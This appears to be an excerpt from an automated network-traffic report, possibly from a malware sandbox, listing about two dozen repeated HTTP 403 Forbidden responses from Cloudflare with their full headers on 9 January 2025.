Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:12 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:27 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wGigMYZbJ0bjaNTIerg1OSk7k19OCU1gBKJnTfzJYDKdRQqKCQBUYv7Rc0s%2B%2FxszUXl0a6KQ%2BIDa1kG8AKadZFsyeXq%2B3tDrNUr5vS4IHUupfsrRG6ambMwb8rz3jin3Ox%2BDkmbiPxU5aYR0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1492fdc7290-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2014&min_rtt=2009&rtt_var=763&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1425085&cwnd=249&unsent_bytes=0&cid=6d75fe4df561976a&ts=148&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:28 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oyEnw7q9Ww0AfmqFh%2BVsQGzgzQBWk7Jli%2Fr%2BMt%2BwLJBwXPzeVekLqnhMe6u8l7i30WHR1kSF0hL5GD5jw9X1mwa281JEKyYZYhCXHNeD8h0DHFGI5l7IAT005Mx0rVIbZLgKV3%2BDuK57JxPU"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c14cdecc7d24-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1963&min_rtt=1958&rtt_var=745&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1457085&cwnd=193&unsent_bytes=0&cid=29d6510b74dd0171&ts=134&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:29 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7C62SOx4k%2FV0jiTkmctHUym91WtucxDZfmyRFSnZj%2FWoPbxrJ%2FAcG9xqxjCCdFZ3MBo69L79kt2%2Fn%2BvT6Au2oSxQk2lqt2Od8hc0poUL90AL6p2FlSr5PLJlI9avaEAbzQrt4BgDdN7%2F%2F5tV"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1508f4d8c96-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1953&min_rtt=1949&rtt_var=739&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1473259&cwnd=188&unsent_bytes=0&cid=1ef5691b89df0441&ts=140&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:29 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IdXJYABxfhPW%2FxwVPTV8tRippZValYUhBkRr76Vo0ccX2PZyw%2FRl3iA9biTI%2BOcjZEWAXoo2xLMmnSCy3A6NNiedfekHQ1kPRHr7LRrOBygp%2B0Q8mSBRDo8T6ERPcLBNKIlTbDKmRE8AjwwH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1545ce642e7-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1720&min_rtt=1715&rtt_var=654&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1660034&cwnd=242&unsent_bytes=0&cid=b2d941996a3f8d42&ts=134&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:30 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rRq5yOWx5U7Ip%2FOXF1BRkq%2BdThW%2F8enMXvdG8k3BSj0u4mpHRWejX%2Batqi3%2BvtdN4SrPIo0CE%2BJ2J5Rrgub9y911rXk%2F26miV3pxpKzC%2B2oRtf%2BGnWkVrhQC5K%2F3tNVFp%2FHBtwvVpsdsvsYl"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1583de0c448-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1581&rtt_var=611&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1766485&cwnd=230&unsent_bytes=0&cid=773cf42083276f0f&ts=156&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:31 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3qpjWKHMkKovM6JCL1vQ4uRWPuMtnPak1CBNENqgwaHNGT2KrlfCR33QdTSkYvvOwPZSUCzn0ataUOuzRijbKGqPuwiAD%2FDG0vp%2BABnEnZauQFcwKqn4zMFxv11ma%2FMEcPZL7Y8XkGN9ILfR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c15c29b09e05-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2011&min_rtt=2008&rtt_var=760&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1433480&cwnd=242&unsent_bytes=0&cid=f6921e5fc1fa7e15&ts=142&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:31 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QNWr%2BYbQ%2BZxI8NDt%2FWkK5uHc30ZALPtMIxlcnXiU4usanpsLe3tkvrBr4n7rCEOegW%2BWNcBDjEyXxTNyar9%2BoU9zK9WSRcYC4uIkj4m0FgZll1PdTY16eG%2BcDbEZwWRhJWGIfsJh6ftJ7bWr"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c15fe833436a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1609&rtt_var=607&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1814791&cwnd=184&unsent_bytes=0&cid=ef141c0b9dfdb8e4&ts=136&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:32 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hk6ljDkwraV22h%2F5%2B%2Fx8I2G3NxjLVgOo5Rx7pzFHVg1YWZNWD3swBAYWjaVe%2BYvVgJ134VOauBR8aQI3s%2Bjr1yraVOgE5Q4iKuhE0vpi5fl7j0Ib7ldylJLW7wqJuHjenLS%2B1giW%2F2pl32jA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1638a3642b0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1732&min_rtt=1729&rtt_var=654&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1665715&cwnd=233&unsent_bytes=0&cid=83490f2fb59149f3&ts=126&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:32 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D5uxK3MptTgGk%2FlP%2BI31ZrThrZ%2Bkght04%2FQ%2FYOTQGsZDA0%2FxhbQ1Mo0HU1OMGbkYb3i%2BsmEJn1WdCaPrqvB0lRgXNQBSUupiNGiabI%2Bb0zVrDvlqrPCsNTDJWv7ZCtsq9pFPR33IA4S9mWC2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c167389d426d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1663&min_rtt=1650&rtt_var=645&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1660978&cwnd=230&unsent_bytes=0&cid=f25990a1a3c51c2c&ts=129&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:33 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PZbshXvlc0zj5E5hhgB%2FwRy8kontQKDfbc%2BDdlGMsa8NPmnObiurX%2FTGiVhSrOoy%2BwdoekWytJY%2FxY1THpl9%2BMPfVqQlEGDYktMBMUJufhBbEvfQxIjyUWvCT7XjncDxdrlBEOJykuPB0nZ%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c16beac11821-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1686&min_rtt=1686&rtt_var=633&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1728833&cwnd=242&unsent_bytes=0&cid=bd0f47285583b778&ts=290&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:19 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:34 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6sb0v1vHxI9e2vU07Egvy7G5OyZD7w5OZImwIRfYP12%2BMEJ07o4dX%2FStdNc0wXvDayvVHWWrHdIHegaqL3vqreyeUMxJNPsjueHRse%2FZqVRXE4fOn4h%2B1KN8MYONifIMXkYerG6R9r9H2yEN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c16fbbdf431a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2091&min_rtt=2082&rtt_var=787&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1402497&cwnd=224&unsent_bytes=0&cid=e7753d828ebfcd40&ts=145&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:19 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:34 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u9fr94RVrF2yoUlBYNRyQe7E5aeaaS7TaEfuBVk%2FpuRK12XoZln2VdDmGnSh3OAclTCmHohfrMPvWMb4pbNwKcmHO8jcOkaOaYskJsfq7mMBX%2BKAQUSZti%2Fy4v1bcHONaBnHK%2Bov1Z8H6cjF"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1738c83efa9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2029&min_rtt=2029&rtt_var=761&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1437007&cwnd=159&unsent_bytes=0&cid=3a3f25b00f5a3cbb&ts=156&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:35 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ctwz1e3fX2CI8dZND9uh8EMy2xYQR3z3GRfmXwSPMOiy08BfJPP0FvRZrzmMx7CZOtFPLrfuGkloJ07VgcIQ3UO17%2BZJ%2F2rm8YF8n%2FLWx52XFhK1fCQ2yHic4w9f%2BxIgG5VTg7kiu32sRRAU"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1775ecc1921-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1646&rtt_var=631&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1713615&cwnd=139&unsent_bytes=0&cid=56a39ed53bef70f9&ts=128&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:36 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NejdcFCFxpmoCNwxik6qQFI1w%2BOFivyIUVh9igAotw3PUZJFaMLZtPXlVsb44J0E%2BgXi5UABPY9PDZBp3e0W6%2FpcyElA3q0Cyubdn4xOOq8PNZKtoXDRZ6XgoZEvCt5mhbxf4o%2FoxfAZG4J2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c17b3ae24273-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2196&min_rtt=2189&rtt_var=835&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1299510&cwnd=32&unsent_bytes=0&cid=281178f5f10e4977&ts=153&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:36 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rg5L1I7kGld36hhElqsGe41xm7XvTSua%2BNMcgEyVsvEsZ5LyWAXBFI0OSTFyeV0wz1sutblgDxXut9fmZLNPPiD4gLzuyg4jkyTrHll%2FCNZ2uRCLx1c8BjRVgWOYcJiQkPF2TGCTohWizzUD"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c17f0989f5f4-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1486&min_rtt=1481&rtt_var=566&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1916010&cwnd=103&unsent_bytes=0&cid=4adba2d93a238623&ts=138&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:37 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YMsVMC2gAA2rYr%2ByAznmRKKNxkeZyBB9SjXivO32LlGT7F%2FZ2dpHtcJU16qU1tmeH6pCwDozz8eQdZzH8pHCZKWP11dLwOGd8vbN%2BUM%2ByFkEuWUjZsu5EbKGhyeD%2FEhbVFLQVXZR2EZnNMus"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c182ca10de98-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1603&min_rtt=1601&rtt_var=605&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1803582&cwnd=212&unsent_bytes=0&cid=323162d565e026dd&ts=147&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:37 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JrsHuef8XcaDJhQtHNn5c%2FuHxqmvHAkiphxRNAMsIb2b0kZJyWwununXFGHaJ5tzGMW7rOLt7LeMibbhSJJTErRBWy75kUs845VnAIXtjUbx6Bi70mDmDc%2FuE8rV8Wdgcvydbnou134gZY6q"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c18689e4438d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1600&rtt_var=605&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1801357&cwnd=225&unsent_bytes=0&cid=0d33618845d492f2&ts=136&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:38 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zKS%2FipbXysePBu3rV0ehVEgfljaD0OdIrNfNEVg6uaR0NXq38SaWL4uU%2B%2B0h%2F%2FWm2rgOeZfbaRBeUkdVDzsJ5pZpgQbAvIVPw5nMD86WF%2B%2BYvk2owB8yYlqcdf%2FprL%2Bx9pygaTjPYXoMNa%2BP"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c18a5a984213-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1636&min_rtt=1624&rtt_var=634&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1693735&cwnd=231&unsent_bytes=0&cid=4c3e8427a42a1d04&ts=135&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:39 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xJ2Gd%2FlMXX4STJ2s2d6jApM9b7wMG4NCfQX0tdHBReW3DETS%2Bor%2BelBfVZaxy6Vg7zmVcN0oUlxQAinMSmNa2Ia4csG4wUYNRkXUqYz2ofKbLlR2oUgHNzeCkRtCtjdI5CTsGVNOoheIFzyd"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c18e29a543ed-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2011&min_rtt=1999&rtt_var=773&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1393794&cwnd=210&unsent_bytes=0&cid=4e44ae4eb0e81e8a&ts=147&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:39 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ZXYyiV1I7mwGU3KxmFz%2Bq0nBFfWCBE9tyXMv8V1xP3bj26POvy3eao5zsvbxmDiyHyCF29OliWUgKfioCdMUzvLaX2h1rhZro25XbQlzm1WMzGQcvtYqizFjwCVZdRLxGJhe1z0Ohxm36tz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1921c854282-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1689&rtt_var=636&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1728833&cwnd=252&unsent_bytes=0&cid=d3478ce0ba50780d&ts=149&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:40 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=922ydS7vBjhJwqN2eNdgnh2CpJuuflSW5HGdE1es1tVDSYxSRW%2F5vGKmqi5K8ZUY7NnqFK8Dun2T5Bx5aSvsNA3ETPVaX8XZK%2FK8869pNpVm5RunHI13uvWoXimQHbsK0Vzh2axmQvGawdtE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c195f8b34258-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1934&min_rtt=1913&rtt_var=759&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1403171&cwnd=181&unsent_bytes=0&cid=0d821a041d1cf2df&ts=150&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:41 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LAur7M3wIfwHtEvKrByrqYA5pdFYW8hXsOIDGwnTnkNeNsP%2FNjwbT9cFxVoQv3LYaBmK2HqkVwCMO%2BistE7xRc8g1yuETeNE%2FowfbGKQ1no8itSUYCktM20RDlQJhVxJN%2B%2F%2FD7TGHy894xq%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c19f1a2d439a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2360&min_rtt=2357&rtt_var=891&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1223805&cwnd=233&unsent_bytes=0&cid=c49d991ad6833ad2&ts=993&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:42 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X2Tk15wS1w%2Fvjklz8%2BZtFTR42EsVbt6pHe0KtPYgvLUTD8nV1%2F1MDZUHiLz9pRfgUwXasDUzO7W%2FHZy8tA50WYhcwKwJRRQ4HUa%2F0xwBe2Zuz4%2Bj5ZqFgsf5K1K1v502d5YWqGVFEju7GyFt"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1a2f951de92-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1629&min_rtt=1610&rtt_var=642&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1655328&cwnd=239&unsent_bytes=0&cid=1033024826a3a3e3&ts=147&x=0"
